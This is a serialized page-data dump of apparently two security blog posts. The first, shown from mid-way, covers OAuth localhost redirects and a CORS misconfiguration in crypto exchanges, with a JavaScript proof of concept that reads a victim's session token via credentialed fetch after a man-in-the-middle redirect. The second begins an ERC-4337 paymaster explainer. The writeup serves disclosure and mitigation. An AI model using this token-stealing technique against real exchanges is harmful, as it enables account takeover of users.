}\n",{"type":24,"tag":301,"props":108122,"children":108123},{"class":303,"line":4741},[108124],{"type":24,"tag":301,"props":108125,"children":108126},{"style":329},[108127],{"type":30,"value":13584},{"type":24,"tag":301,"props":108129,"children":108130},{"class":303,"line":4757},[108131],{"type":24,"tag":301,"props":108132,"children":108133},{"emptyLinePlaceholder":16},[108134],{"type":30,"value":341},{"type":24,"tag":301,"props":108136,"children":108137},{"class":303,"line":4765},[108138],{"type":24,"tag":301,"props":108139,"children":108140},{"style":329},[108141],{"type":30,"value":108142}," google.accounts.id.prompt();\n",{"type":24,"tag":301,"props":108144,"children":108145},{"class":303,"line":4773},[108146],{"type":24,"tag":301,"props":108147,"children":108148},{"style":329},[108149],{"type":30,"value":3085},{"type":24,"tag":301,"props":108151,"children":108152},{"class":303,"line":4781},[108153,108158,108162,108167],{"type":24,"tag":301,"props":108154,"children":108155},{"style":329},[108156],{"type":30,"value":108157}," \"\"\"",{"type":24,"tag":301,"props":108159,"children":108160},{"style":359},[108161],{"type":30,"value":206},{"type":24,"tag":301,"props":108163,"children":108164},{"style":314},[108165],{"type":30,"value":108166},"trimIndent",{"type":24,"tag":301,"props":108168,"children":108169},{"style":359},[108170],{"type":30,"value":14551},{"type":24,"tag":301,"props":108172,"children":108173},{"class":303,"line":4789},[108174],{"type":24,"tag":301,"props":108175,"children":108176},{"style":359},[108177],{"type":30,"value":108178}," }\n",{"type":24,"tag":301,"props":108180,"children":108181},{"class":303,"line":4848},[108182],{"type":24,"tag":301,"props":108183,"children":108184},{"style":359},[108185],{"type":30,"value":77761},{"type":24,"tag":301,"props":108187,"children":108188},{"class":303,"line":4862},[108189],{"type":24,"tag":301,"props":108190,"children":108191},{"style":359},[108192],{"type":30,"value":77691},{"type":24,"tag":301,"props":108194,"children":108195},{"class":303,"line":4871},[108196,108200],{"type":24,"tag":301,"props":108197,"children":108198},{"style":314},[108199],{"type":30,"value":77699},{"type":24,"tag":301,"props":108201,"children":108202},{"style":359},[108203],{"type":30,"value":3035},{"type":24,"tag":301,"props":108205,"children":108206},{"class":303,"line":4879},[108207,108211,108215,108219,108224],{"type":24,"tag":301,"props":108208,"children":108209},{"style":314},[108210],{"type":30,"value":77711},{"type":24,"tag":301,"props":108212,"children":108213},{"style":359},[108214],{"type":30,"value":16392},{"type":24,"tag":301,"props":108216,"children":108217},{"style":385},[108218],{"type":30,"value":11206},{"type":24,"tag":301,"props":108220,"children":108221},{"style":329},[108222],{"type":30,"value":108223},"\"Login here:\"",{"type":24,"tag":301,"props":108225,"children":108226},{"style":359},[108227],{"type":30,"value":16401},{"type":24,"tag":301,"props":108229,"children":108230},{"class":303,"line":4942},[108231,108236],{"type":24,"tag":301,"props":108232,"children":108233},{"style":314},[108234],{"type":30,"value":108235}," div",{"type":24,"tag":301,"props":108237,"children":108238},{"style":359},[108239],{"type":30,"value":3035},{"type":24,"tag":301,"props":108241,"children":108242},{"class":303,"line":4955},[108243,108248,108252],{"type":24,"tag":301,"props":108244,"children":108245},{"style":359},[108246],{"type":30,"value":108247}," id ",{"type":24,"tag":301,"props":108249,"children":108250},{"style":385},[108251],{"type":30,"value":523},{"type":24,"tag":301,"props":108253,"children":108254},{"style":329},[108255],{"type":30,"value":108256}," \"g_id_signin\"\n",{"type":24,"tag":301,"props":108258,"children":108259},{"class":303,"line":94926},[108260],{"type":24,"tag":301,"props":108261,"children":108262},{"style":359},[108263],{"type":30,"value":77761},{"type":24,"tag":301,"props":108265,"children":108266},{"class":303,"line":94934},[108267],{"type":24,"tag":301,"props":108268,"children":108269},{"style":359},[108270],{"type":30,"value":77691},{"type":24,"tag":301,"props":108272,"children":108274},{"class":303,"line":108273},62,[108275],{"type":24,"tag":301,"props":108276,"children":108277},{"style":359},[108278],{"type":30,"value":77776},{"type":24,"tag":301,"props":108280,"children":108282},{"class":303,"line":108281},63,[108283],{"type":24,"tag":301,"props":108284,"children":108285},{"style":359},[108286],{"type":30,"value":4211},{"type":24,"tag":301,"props":108288,"children":108290},{"class":303,"line":108289},64,[108291],{"type":24,"tag":301,"props":108292,"children":108293},{"style":359},[108294],{"type":30,"value":65600},{"type":24,"tag":301,"props":108296,"children":108298},{"class":303,"line":108297},65,[108299,108303,108307,108311,108315,108319],{"type":24,"tag":301,"props":108300,"children":108301},{"style":359},[108302],{"type":30,"value":77798},{"type":24,"tag":301,"props":108304,"children":108305},{"style":314},[108306],{"type":30,"value":77803},{"type":24,"tag":301,"props":108308,"children":108309},{"style":359},[108310],{"type":30,"value":77808},{"type":24,"tag":301,"props":108312,"children":108313},{"style":385},[108314],{"type":30,"value":523},{"type":24,"tag":301,"props":108316,"children":108317},{"style":348},[108318],{"type":30,"value":3440},{"type":24,"tag":301,"props":108320,"children":108321},{"style":359},[108322],{"type":30,"value":791},{"type":24,"tag":301,"props":108324,"children":108326},{"class":303,"line":108325},66,[108327],{"type":24,"tag":301,"props":108328,"children":108329},{"style":359},[108330],{"type":30,"value":501},{"type":24,"tag":32,"props":108332,"children":108333},{},[108334],{"type":30,"value":108335},"We also reported this vulnerability to the Web3Auth mobile SDK, Slush Wallet, Kukai Wallet, and several other web3 platforms. As mentioned earlier, this issue could have allowed account takeover with zero user interaction if the user had installed an application that exploited the localhost redirect.",{"type":24,"tag":32,"props":108337,"children":108338},{},[108339],{"type":30,"value":108340},"Each team responded promptly, communicated clearly, and shipped fixes quickly. Their diligence set a strong example for coordinated response and helped ensure user security across the ecosystem.",{"type":24,"tag":80,"props":108342,"children":108344},{"id":108343},"how-to-mitigate",[108345],{"type":30,"value":108346},"How to Mitigate",{"type":24,"tag":32,"props":108348,"children":108349},{},[108350],{"type":30,"value":108351},"The proper way to mitigate this issue is to disallow localhost in the live environment. Developers should have a separate staging OAuth environment with a different client ID for testing purposes. It's important to ensure that tokens generated using the test client ID are not valid in the live environment.",{"type":24,"tag":43,"props":108353,"children":108355},{"id":108354},"exploiting-cors",[108356],{"type":30,"value":108357},"Exploiting CORS",{"type":24,"tag":32,"props":108359,"children":108360},{},[108361],{"type":30,"value":108362},"Another bug we found during our research was related to CORS misconfiguration and how different browsers handle mixed content requests.",{"type":24,"tag":32,"props":108364,"children":108365},{},[108366,108368,108374],{"type":30,"value":108367},"While checking for other bugs in exchanges, we found a CORS (Cross-Origin Resource Sharing) configuration allowing credentials and ",{"type":24,"tag":145,"props":108369,"children":108371},{"className":108370},[],[108372],{"type":30,"value":108373},"http://",{"type":30,"value":108375}," schema for any subdomain:",{"type":24,"tag":291,"props":108377,"children":108381},{"className":108378,"code":108379,"language":108380,"meta":7,"style":7},"language-http shiki shiki-themes slack-dark","HTTP 200 OK\nAccess-Control-Allow-Origin: http://aa.exchange.com\nAccess-Control-Allow-Credentials: true\n[...]\n","http",[108382],{"type":24,"tag":145,"props":108383,"children":108384},{"__ignoreMap":7},[108385,108393,108401,108409],{"type":24,"tag":301,"props":108386,"children":108387},{"class":303,"line":304},[108388],{"type":24,"tag":301,"props":108389,"children":108390},{},[108391],{"type":30,"value":108392},"HTTP 200 OK\n",{"type":24,"tag":301,"props":108394,"children":108395},{"class":303,"line":320},[108396],{"type":24,"tag":301,"props":108397,"children":108398},{},[108399],{"type":30,"value":108400},"Access-Control-Allow-Origin: http://aa.exchange.com\n",{"type":24,"tag":301,"props":108402,"children":108403},{"class":303,"line":335},[108404],{"type":24,"tag":301,"props":108405,"children":108406},{},[108407],{"type":30,"value":108408},"Access-Control-Allow-Credentials: true\n",{"type":24,"tag":301,"props":108410,"children":108411},{"class":303,"line":344},[108412],{"type":24,"tag":301,"props":108413,"children":108414},{},[108415],{"type":30,"value":17123},{"type":24,"tag":80,"props":108417,"children":108419},{"id":108418},"cors-misconfiguration-by-lack-of-tls",[108420],{"type":30,"value":108421},"CORS Misconfiguration by Lack of TLS",{"type":24,"tag":32,"props":108423,"children":108424},{},[108425,108427,108433],{"type":30,"value":108426},"This case requires specific preconditions. The idea is to redirect the user to an insecure subdomain of ",{"type":24,"tag":145,"props":108428,"children":108430},{"className":108429},[],[108431],{"type":30,"value":108432},"exchange.com",{"type":30,"value":108434}," and spoof the response by intercepting and tampering with the victim's network packets.",{"type":24,"tag":32,"props":108436,"children":108437},{},[108438],{"type":30,"value":108439},"However, while testing it by simulating an MITM attack, we figured out that this type of attack behaves differently amongst the main browsers:",{"type":24,"tag":2655,"props":108441,"children":108442},{},[108443,108463],{"type":24,"tag":2659,"props":108444,"children":108445},{},[108446,108448,108453,108455,108461],{"type":30,"value":108447},"Chrome --> won't work because cookies are not sent in ",{"type":24,"tag":145,"props":108449,"children":108451},{"className":108450},[],[108452],{"type":30,"value":108373},{"type":30,"value":108454}," --> ",{"type":24,"tag":145,"props":108456,"children":108458},{"className":108457},[],[108459],{"type":30,"value":108460},"https://",{"type":30,"value":108462}," requests, even if same-site",{"type":24,"tag":2659,"props":108464,"children":108465},{},[108466,108468],{"type":30,"value":108467},"Firefox and Safari --> works since cookies are sent from an insecure context ",{"type":24,"tag":145,"props":108469,"children":108471},{"className":108470},[],[108472],{"type":30,"value":44504},{"type":24,"tag":80,"props":108474,"children":108476},{"id":108475},"exploit-1",[108477],{"type":30,"value":106807},{"type":24,"tag":32,"props":108479,"children":108480},{},[108481],{"type":30,"value":108482},"To exploit it, we must follow some steps:",{"type":24,"tag":6246,"props":108484,"children":108485},{},[108486,108491,108496],{"type":24,"tag":2659,"props":108487,"children":108488},{},[108489],{"type":30,"value":108490},"Force the victim to enter an insecure webpage in the exchange subdomain",{"type":24,"tag":2659,"props":108492,"children":108493},{},[108494],{"type":30,"value":108495},"Deliver the malicious script to the victim using MITM (Man-In-The-Middle)",{"type":24,"tag":2659,"props":108497,"children":108498},{},[108499,108501,108506],{"type":30,"value":108500},"Use ",{"type":24,"tag":145,"props":108502,"children":108504},{"className":108503},[],[108505],{"type":30,"value":44504},{"type":30,"value":108507}," with CORS to do something malicious using the victim's account",{"type":24,"tag":32,"props":108509,"children":108510},{},[108511],{"type":30,"value":108512},"To exploit the CORS issue, an attacker must first get the victim to load an insecure subdomain. This can be achieved through techniques such as spoofing Wi-Fi or creating a fake public network that automatically opens the insecure page as the captive portal.",{"type":24,"tag":32,"props":108514,"children":108515},{},[108516,108518,108523],{"type":30,"value":108517},"Once the redirect to the ",{"type":24,"tag":145,"props":108519,"children":108521},{"className":108520},[],[108522],{"type":30,"value":108373},{"type":30,"value":108524}," website is made, if the attacker is in an adjacent network, it is possible to intercept the HTTP request/response (or DNS resolve) and tamper with the returning page. The returning page should have a malicious script that exploits the CORS misconfiguration:",{"type":24,"tag":291,"props":108526,"children":108528},{"className":38119,"code":108527,"language":38121,"meta":7,"style":7},"(async () => {\n let res = await fetch('https://www.exchange.com/api/session_token', {\n credentials: 'include',\n method: 'POST',\n });\n console.log(await res.json());\n})();\n",[108529],{"type":24,"tag":145,"props":108530,"children":108531},{"__ignoreMap":7},[108532,108555,108592,108609,108626,108633,108674],{"type":24,"tag":301,"props":108533,"children":108534},{"class":303,"line":304},[108535,108539,108543,108547,108551],{"type":24,"tag":301,"props":108536,"children":108537},{"style":359},[108538],{"type":30,"value":362},{"type":24,"tag":301,"props":108540,"children":108541},{"style":348},[108542],{"type":30,"value":4919},{"type":24,"tag":301,"props":108544,"children":108545},{"style":359},[108546],{"type":30,"value":46432},{"type":24,"tag":301,"props":108548,"children":108549},{"style":348},[108550],{"type":30,"value":4841},{"type":24,"tag":301,"props":108552,"children":108553},{"style":359},[108554],{"type":30,"value":3035},{"type":24,"tag":301,"props":108556,"children":108557},{"class":303,"line":320},[108558,108562,108567,108571,108575,108579,108583,108588],{"type":24,"tag":301,"props":108559,"children":108560},{"style":348},[108561],{"type":30,"value":14671},{"type":24,"tag":301,"props":108563,"children":108564},{"style":369},[108565],{"type":30,"value":108566}," res",{"type":24,"tag":301,"props":108568,"children":108569},{"style":385},[108570],{"type":30,"value":2537},{"type":24,"tag":301,"props":108572,"children":108573},{"style":308},[108574],{"type":30,"value":4617},{"type":24,"tag":301,"props":108576,"children":108577},{"style":314},[108578],{"type":30,"value":39679},{"type":24,"tag":301,"props":108580,"children":108581},{"style":359},[108582],{"type":30,"value":362},{"type":24,"tag":301,"props":108584,"children":108585},{"style":329},[108586],{"type":30,"value":108587},"'https://www.exchange.com/api/session_token'",{"type":24,"tag":301,"props":108589,"children":108590},{"style":359},[108591],{"type":30,"value":4190},{"type":24,"tag":301,"props":108593,"children":108594},{"class":303,"line":335},[108595,108600,108605],{"type":24,"tag":301,"props":108596,"children":108597},{"style":369},[108598],{"type":30,"value":108599}," credentials:",{"type":24,"tag":301,"props":108601,"children":108602},{"style":329},[108603],{"type":30,"value":108604}," 'include'",{"type":24,"tag":301,"props":108606,"children":108607},{"style":359},[108608],{"type":30,"value":1729},{"type":24,"tag":301,"props":108610,"children":108611},{"class":303,"line":344},[108612,108617,108622],{"type":24,"tag":301,"props":108613,"children":108614},{"style":369},[108615],{"type":30,"value":108616}," method:",{"type":24,"tag":301,"props":108618,"children":108619},{"style":329},[108620],{"type":30,"value":108621}," 'POST'",{"type":24,"tag":301,"props":108623,"children":108624},{"style":359},[108625],{"type":30,"value":1729},{"type":24,"tag":301,"props":108627,"children":108628},{"class":303,"line":401},[108629],{"type":24,"tag":301,"props":108630,"children":108631},{"style":359},[108632],{"type":30,"value":104890},{"type":24,"tag":301,"props":108634,"children":108635},{"class":303,"line":415},[108636,108641,108645,108650,108654,108658,108662,108666,108670],{"type":24,"tag":301,"props":108637,"children":108638},{"style":369},[108639],{"type":30,"value":108640}," console",{"type":24,"tag":301,"props":108642,"children":108643},{"style":359},[108644],{"type":30,"value":206},{"type":24,"tag":301,"props":108646,"children":108647},{"style":314},[108648],{"type":30,"value":108649},"log",{"type":24,"tag":301,"props":108651,"children":108652},{"style":359},[108653],{"type":30,"value":362},{"type":24,"tag":301,"props":108655,"children":108656},{"style":308},[108657],{"type":30,"value":39666},{"type":24,"tag":301,"props":108659,"children":108660},{"style":369},[108661],{"type":30,"value":108566},{"type":24,"tag":301,"props":108663,"children":108664},{"style":359},[108665],{"type":30,"value":206},{"type":24,"tag":301,"props":108667,"children":108668},{"style":314},[108669],{"type":30,"value":6680},{"type":24,"tag":301,"props":108671,"children":108672},{"style":359},[108673],{"type":30,"value":22214},{"type":24,"tag":301,"props":108675,"children":108676},{"class":303,"line":439},[108677],{"type":24,"tag":301,"props":108678,"children":108679},{"style":359},[108680],{"type":30,"value":108681},"})();\n",{"type":24,"tag":32,"props":108683,"children":108684},{},[108685],{"type":30,"value":108686},"During our research, the misconfiguration we found was in an API with an endpoint to return the session token, so the impact was an account takeover (ATO) with some limitations since exchanges usually have MFA to perform some actions like withdrawing.",{"type":24,"tag":80,"props":108688,"children":108689},{"id":47069},[108690],{"type":30,"value":47072},{"type":24,"tag":32,"props":108692,"children":108693},{},[108694,108696,108701],{"type":30,"value":108695},"As mitigation, it is recommended to remove all ",{"type":24,"tag":145,"props":108697,"children":108699},{"className":108698},[],[108700],{"type":30,"value":108373},{"type":30,"value":108702}," URLs from the CORS configuration, including localhost, since a local web server in a mobile environment can abuse it.",{"type":24,"tag":32,"props":108704,"children":108705},{},[108706],{"type":30,"value":108707},"Also, as additional/alternative remediation, it is possible to configure the HSTS policy to include all subdomains and prevent insecure subdomains from loading in the browser.",{"type":24,"tag":43,"props":108709,"children":108710},{"id":9652},[108711],{"type":30,"value":9655},{"type":24,"tag":32,"props":108713,"children":108714},{},[108715],{"type":30,"value":108716},"In conclusion, our deep dive into authentication and client-side bugs within exchange platforms revealed several vulnerabilities stemming from misconfigurations. These types of attacks show the complexity of securing client-side applications due to the different contexts and environments they can operate in.",{"type":24,"tag":32,"props":108718,"children":108719},{},[108720],{"type":30,"value":108721},"It also demonstrates how development configurations can harm the application's security if they are also used in production. Thus, auditors must always understand in which environments and contexts the application will/can be run in, and ensure that the configurations are not insecure for use in production.",{"type":24,"tag":9672,"props":108723,"children":108724},{},[108725],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":108727},[108728,108733,108738],{"id":106412,"depth":320,"text":106415,"children":108729},[108730,108731,108732],{"id":106423,"depth":335,"text":106426},{"id":106780,"depth":335,"text":106783},{"id":108343,"depth":335,"text":108346},{"id":108354,"depth":320,"text":108357,"children":108734},[108735,108736,108737],{"id":108418,"depth":335,"text":108421},{"id":108475,"depth":335,"text":106807},{"id":47069,"depth":335,"text":47072},{"id":9652,"depth":320,"text":9655},"content:blog:2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations",{"_path":108743,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":108744,"description":108745,"date":108746,"author":108747,"image":108748,"isFeatured":16,"onBlogPage":16,"tags":108750,"body":108753,"_type":9700,"_id":114523,"_source":9702,"_file":114524,"_stem":114525,"_extension":9705},"/blog/2025-12-02-paymasters-evm","ERC-4337 Paymasters: Better UX, Hidden Risks","ERC-4337 paymasters unlock powerful UX by abstracting gas costs, but they also add complexity and subtle bugs. Explore some common pitfalls in real-world implementations and learn how to design production-ready paymasters.","2025-12-02T12:00:00.000Z","nicholas",{"src":108749,"width":14,"height":15},"/posts/paymasters-evm/title.png",[108751,108752],"evm","ERC-4337",{"type":21,"children":108754,"toc":114502},[108755,108759,108770,108775,108780,108785,108791,108797,108802,108807,108813,108818,108846,108852,108857,108864,108869,108879,108884,108910,108916,108936,108942,108962,108970,109000,109033,109042,109053,109078,109090,109103,109146,109152,109185,109284,109303,109326,109331,109337,109365,109512,109517,109544,109550,109562,109574,109583,109618,109623,111108,111136,111157,111162,111174,111183,111188,111206,111229,111234,111240,111294,111300,111333,111368,112192,112228,112264,112330,112363,112861,112914,112926,113490,113559,113586,114208,114250,114277,114289,114350,114369,114403,114408,114413,114418,114422,114427,114462,114488,114493,114498],{"type":24,"tag":25,"props":108756,"children":108757},{"id":35771},[108758],{"type":30,"value":35774},{"type":24,"tag":32,"props":108760,"children":108761},{},[108762,108768],{"type":24,"tag":188,"props":108763,"children":108766},{"href":108764,"rel":108765},"https://docs.erc4337.io/",[192],[108767],{"type":30,"value":108752},{"type":30,"value":108769}," (Account Abstraction) has unlocked a new wave of UX improvements for Ethereum. By decoupling users from EOAs (Externally Owned Accounts), it enables smart contract wallets, gas sponsorships, and flexible authentication mechanisms.",{"type":24,"tag":32,"props":108771,"children":108772},{},[108773],{"type":30,"value":108774},"One of the most powerful features introduced by ERC-4337 is the paymaster, a contract that can sponsor gas fees for users. This allows dApps to deliver seamless, “gasless” experiences where users don’t have to hold ETH to transact.",{"type":24,"tag":32,"props":108776,"children":108777},{},[108778],{"type":30,"value":108779},"However, building a correct paymaster isn’t trivial. We’ve seen many developers trip up on subtle details of the standard, which can cause unexpected behavior or unnecessary complexity.",{"type":24,"tag":32,"props":108781,"children":108782},{},[108783],{"type":30,"value":108784},"In this article, we’ll break down how ERC-4337 works at a high level, zoom in on the paymaster’s role, and walk through the most common pitfalls we’ve observed when implementing paymasters. By the end, you’ll have a clear picture of how to design paymasters that follow best practices and are production-ready.",{"type":24,"tag":25,"props":108786,"children":108788},{"id":108787},"erc4337-overview",[108789],{"type":30,"value":108790},"ERC4337 Overview",{"type":24,"tag":43,"props":108792,"children":108794},{"id":108793},"traditional-eoas-vs-smart-contract-wallets",[108795],{"type":30,"value":108796},"Traditional EOAs vs Smart Contract Wallets",{"type":24,"tag":32,"props":108798,"children":108799},{},[108800],{"type":30,"value":108801},"In Ethereum’s early design, user accounts are Externally Owned Accounts (EOAs), controlled by a private key. When you send a transaction (e.g. token transfer or contract call), your private key signs the transaction, and you must pay gas in ETH. If the key is lost or stolen, you lose access to everything permanently. This setup is simple, but also rigid and risky.",{"type":24,"tag":32,"props":108803,"children":108804},{},[108805],{"type":30,"value":108806},"By contrast, smart contract accounts (or \"smart wallets\") are programmable. They can enforce logic like multiple signatures, spending limits, social recovery, batching, and more, automating many aspects of security and usability.",{"type":24,"tag":43,"props":108808,"children":108810},{"id":108809},"why-erc4337-was-introduced",[108811],{"type":30,"value":108812},"Why ERC‑4337 Was Introduced",{"type":24,"tag":32,"props":108814,"children":108815},{},[108816],{"type":30,"value":108817},"Smart wallets offer powerful features, but Ethereum’s protocol restricts transactions to originate only from EOAs. Previous proposals (e.g. EIP‑2938, EIP‑3074) tried to change the protocol itself, requiring a hard fork. ERC‑4337 achieves account abstraction entirely off‑chain, using higher-layer infrastructure without any changes to Ethereum’s consensus layer. This unlocks key UX improvements:",{"type":24,"tag":2655,"props":108819,"children":108820},{},[108821,108826,108831,108836,108841],{"type":24,"tag":2659,"props":108822,"children":108823},{},[108824],{"type":30,"value":108825},"User recovery for lost keys (e.g. social recovery)",{"type":24,"tag":2659,"props":108827,"children":108828},{},[108829],{"type":30,"value":108830},"Batched or atomic multi-step operations in one flow",{"type":24,"tag":2659,"props":108832,"children":108833},{},[108834],{"type":30,"value":108835},"Paying gas fees with ERC‑20 tokens or via sponsor (gasless UX)",{"type":24,"tag":2659,"props":108837,"children":108838},{},[108839],{"type":30,"value":108840},"Using custom signature schemes or multisig logic",{"type":24,"tag":2659,"props":108842,"children":108843},{},[108844],{"type":30,"value":108845},"Creation and use of smart contract wallets without needing ETH or seed phrase upfront",{"type":24,"tag":43,"props":108847,"children":108849},{"id":108848},"how-erc-4337-works",[108850],{"type":30,"value":108851},"How ERC-4337 Works",{"type":24,"tag":32,"props":108853,"children":108854},{},[108855],{"type":30,"value":108856},"Before diving into each component, let's look at how ERC-4337 works at a high level:",{"type":24,"tag":32,"props":108858,"children":108859},{},[108860],{"type":24,"tag":177,"props":108861,"children":108863},{"alt":179,"src":108862},"/posts/paymasters-evm/flowchart.png",[],{"type":24,"tag":32,"props":108865,"children":108866},{},[108867],{"type":30,"value":108868},"The diagram above shows the key flow of ERC-4337. Below is a short explanation of each component shown above.",{"type":24,"tag":80,"props":108870,"children":108872},{"id":108871},"useroperation",[108873],{"type":24,"tag":145,"props":108874,"children":108876},{"className":108875},[],[108877],{"type":30,"value":108878},"UserOperation",{"type":24,"tag":32,"props":108880,"children":108881},{},[108882],{"type":30,"value":108883},"A UserOperation is a pseudo‑transaction object representing the user’s intent. It includes data like:",{"type":24,"tag":2655,"props":108885,"children":108886},{},[108887,108892,108897],{"type":24,"tag":2659,"props":108888,"children":108889},{},[108890],{"type":30,"value":108891},"Target contract call(s)",{"type":24,"tag":2659,"props":108893,"children":108894},{},[108895],{"type":30,"value":108896},"Signature or validation metadata",{"type":24,"tag":2659,"props":108898,"children":108899},{},[108900,108902,108908],{"type":30,"value":108901},"Gas limits and fee payment details (wallet address, paymaster, bundler)\n",{"type":24,"tag":145,"props":108903,"children":108905},{"className":108904},[],[108906],{"type":30,"value":108907},"UserOperations",{"type":30,"value":108909}," are submitted to a separate mempool (often called alt‑mempool), not the regular Ethereum transaction pool.",{"type":24,"tag":80,"props":108911,"children":108913},{"id":108912},"smart-contract-account",[108914],{"type":30,"value":108915},"Smart Contract Account",{"type":24,"tag":32,"props":108917,"children":108918},{},[108919,108921,108927,108928,108934],{"type":30,"value":108920},"Often called Sender or Smart Account, this is a user-controlled contract implementing logic via ",{"type":24,"tag":145,"props":108922,"children":108924},{"className":108923},[],[108925],{"type":30,"value":108926},"validateUserOp()",{"type":30,"value":2378},{"type":24,"tag":145,"props":108929,"children":108931},{"className":108930},[],[108932],{"type":30,"value":108933},"executeUserOp()",{"type":30,"value":108935},". It specifies custom rules: signature checking, nonce logic, allowed calls, or spending limits.",{"type":24,"tag":80,"props":108937,"children":108939},{"id":108938},"bundler",[108940],{"type":30,"value":108941},"Bundler",{"type":24,"tag":32,"props":108943,"children":108944},{},[108945,108947,108952,108954,108960],{"type":30,"value":108946},"A Bundler is an off‑chain service or node monitoring the alt‑mempool. It collects multiple ",{"type":24,"tag":145,"props":108948,"children":108950},{"className":108949},[],[108951],{"type":30,"value":108907},{"type":30,"value":108953},", packages them, and submits them in a single transaction to the ",{"type":24,"tag":145,"props":108955,"children":108957},{"className":108956},[],[108958],{"type":30,"value":108959},"EntryPoint",{"type":30,"value":108961}," contract. Bundlers must use an EOA to pay gas upfront and are later reimbursed.",{"type":24,"tag":80,"props":108963,"children":108964},{"id":21515},[108965],{"type":24,"tag":145,"props":108966,"children":108968},{"className":108967},[],[108969],{"type":30,"value":108959},{"type":24,"tag":32,"props":108971,"children":108972},{},[108973,108974,108979,108981,108986,108988,108992,108993,108998],{"type":30,"value":8079},{"type":24,"tag":145,"props":108975,"children":108977},{"className":108976},[],[108978],{"type":30,"value":108959},{"type":30,"value":108980}," contract acts as the central on-chain gateway for ERC-4337. For every batch of ",{"type":24,"tag":145,"props":108982,"children":108984},{"className":108983},[],[108985],{"type":30,"value":108907},{"type":30,"value":108987}," submitted by a ",{"type":24,"tag":60,"props":108989,"children":108990},{},[108991],{"type":30,"value":108941},{"type":30,"value":7905},{"type":24,"tag":145,"props":108994,"children":108996},{"className":108995},[],[108997],{"type":30,"value":108959},{"type":30,"value":108999}," validates and routes each operation back to the corresponding Smart Contract Wallet for execution.",{"type":24,"tag":32,"props":109001,"children":109002},{},[109003,109005,109010,109012,109016,109018,109023,109025,109031],{"type":30,"value":109004},"Once all operations have been processed, the ",{"type":24,"tag":145,"props":109006,"children":109008},{"className":109007},[],[109009],{"type":30,"value":108959},{"type":30,"value":109011}," calculates the total gas consumed and reimburses the ",{"type":24,"tag":60,"props":109013,"children":109014},{},[109015],{"type":30,"value":108941},{"type":30,"value":109017},". This payment can come either directly from the sender's Smart Account deposit in the ",{"type":24,"tag":145,"props":109019,"children":109021},{"className":109020},[],[109022],{"type":30,"value":108959},{"type":30,"value":109024}," or from a ",{"type":24,"tag":145,"props":109026,"children":109028},{"className":109027},[],[109029],{"type":30,"value":109030},"paymaster",{"type":30,"value":109032}," that has agreed to sponsor the transaction.",{"type":24,"tag":80,"props":109034,"children":109035},{"id":109030},[109036],{"type":24,"tag":145,"props":109037,"children":109039},{"className":109038},[],[109040],{"type":30,"value":109041},"Paymaster",{"type":24,"tag":32,"props":109043,"children":109044},{},[109045,109046,109051],{"type":30,"value":5693},{"type":24,"tag":145,"props":109047,"children":109049},{"className":109048},[],[109050],{"type":30,"value":109030},{"type":30,"value":109052}," is an optional smart contract that enables flexible gas payment options. It can either sponsor gas fees directly or allow users to pay gas using ERC-20 tokens instead of ETH. It runs two key functions:",{"type":24,"tag":2655,"props":109054,"children":109055},{},[109056,109067],{"type":24,"tag":2659,"props":109057,"children":109058},{},[109059,109065],{"type":24,"tag":145,"props":109060,"children":109062},{"className":109061},[],[109063],{"type":30,"value":109064},"validatePaymasterUserOp()",{"type":30,"value":109066}," to validate the operation. This can check sponsorship eligibility or verify that the user has sufficient ERC-20 token balance and allowance to cover gas costs. The exact implementation of the function depends on how the protocol implements it.",{"type":24,"tag":2659,"props":109068,"children":109069},{},[109070,109076],{"type":24,"tag":145,"props":109071,"children":109073},{"className":109072},[],[109074],{"type":30,"value":109075},"postOp()",{"type":30,"value":109077},", which handles post-execution accounting. For sponsored transactions, this may update internal accounting records, while for token payments, it typically finalizes any accounting related to the ERC-20 token payment.",{"type":24,"tag":32,"props":109079,"children":109080},{},[109081,109083,109088],{"type":30,"value":109082},"By supporting both sponsorship and token-based gas payments, ",{"type":24,"tag":145,"props":109084,"children":109086},{"className":109085},[],[109087],{"type":30,"value":109030},{"type":30,"value":109089}," removes the requirement for users to hold ETH, enabling truly gasless transactions through either model.",{"type":24,"tag":43,"props":109091,"children":109093},{"id":109092},"understanding-the-entrypoints-flow",[109094,109096,109101],{"type":30,"value":109095},"Understanding the ",{"type":24,"tag":145,"props":109097,"children":109099},{"className":109098},[],[109100],{"type":30,"value":108959},{"type":30,"value":109102},"'s Flow",{"type":24,"tag":32,"props":109104,"children":109105},{},[109106,109108,109113,109114,109119,109121,109132,109134,109139,109140,109145],{"type":30,"value":109107},"When a bundler submits ",{"type":24,"tag":145,"props":109109,"children":109111},{"className":109110},[],[109112],{"type":30,"value":108907},{"type":30,"value":23198},{"type":24,"tag":145,"props":109115,"children":109117},{"className":109116},[],[109118],{"type":30,"value":108959},{"type":30,"value":109120}," contract via ",{"type":24,"tag":188,"props":109122,"children":109125},{"href":109123,"rel":109124},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L58",[192],[109126],{"type":24,"tag":145,"props":109127,"children":109129},{"className":109128},[],[109130],{"type":30,"value":109131},"handleOps()",{"type":30,"value":109133},", the processing occurs in two main phases: ",{"type":24,"tag":60,"props":109135,"children":109136},{},[109137],{"type":30,"value":109138},"Validation",{"type":30,"value":2378},{"type":24,"tag":60,"props":109141,"children":109142},{},[109143],{"type":30,"value":109144},"Execution",{"type":30,"value":206},{"type":24,"tag":80,"props":109147,"children":109149},{"id":109148},"validation-phase",[109150],{"type":30,"value":109151},"Validation Phase",{"type":24,"tag":32,"props":109153,"children":109154},{},[109155,109157,109162,109164,109170,109172,109178,109179,109184],{"type":30,"value":109156},"In this phase, the ",{"type":24,"tag":145,"props":109158,"children":109160},{"className":109159},[],[109161],{"type":30,"value":108959},{"type":30,"value":109163}," first validates all operations in the submitted ",{"type":24,"tag":145,"props":109165,"children":109167},{"className":109166},[],[109168],{"type":30,"value":109169},"UserOps",{"type":30,"value":109171}," array before executing any of them. This ensures that only valid operations proceed to execution. For each 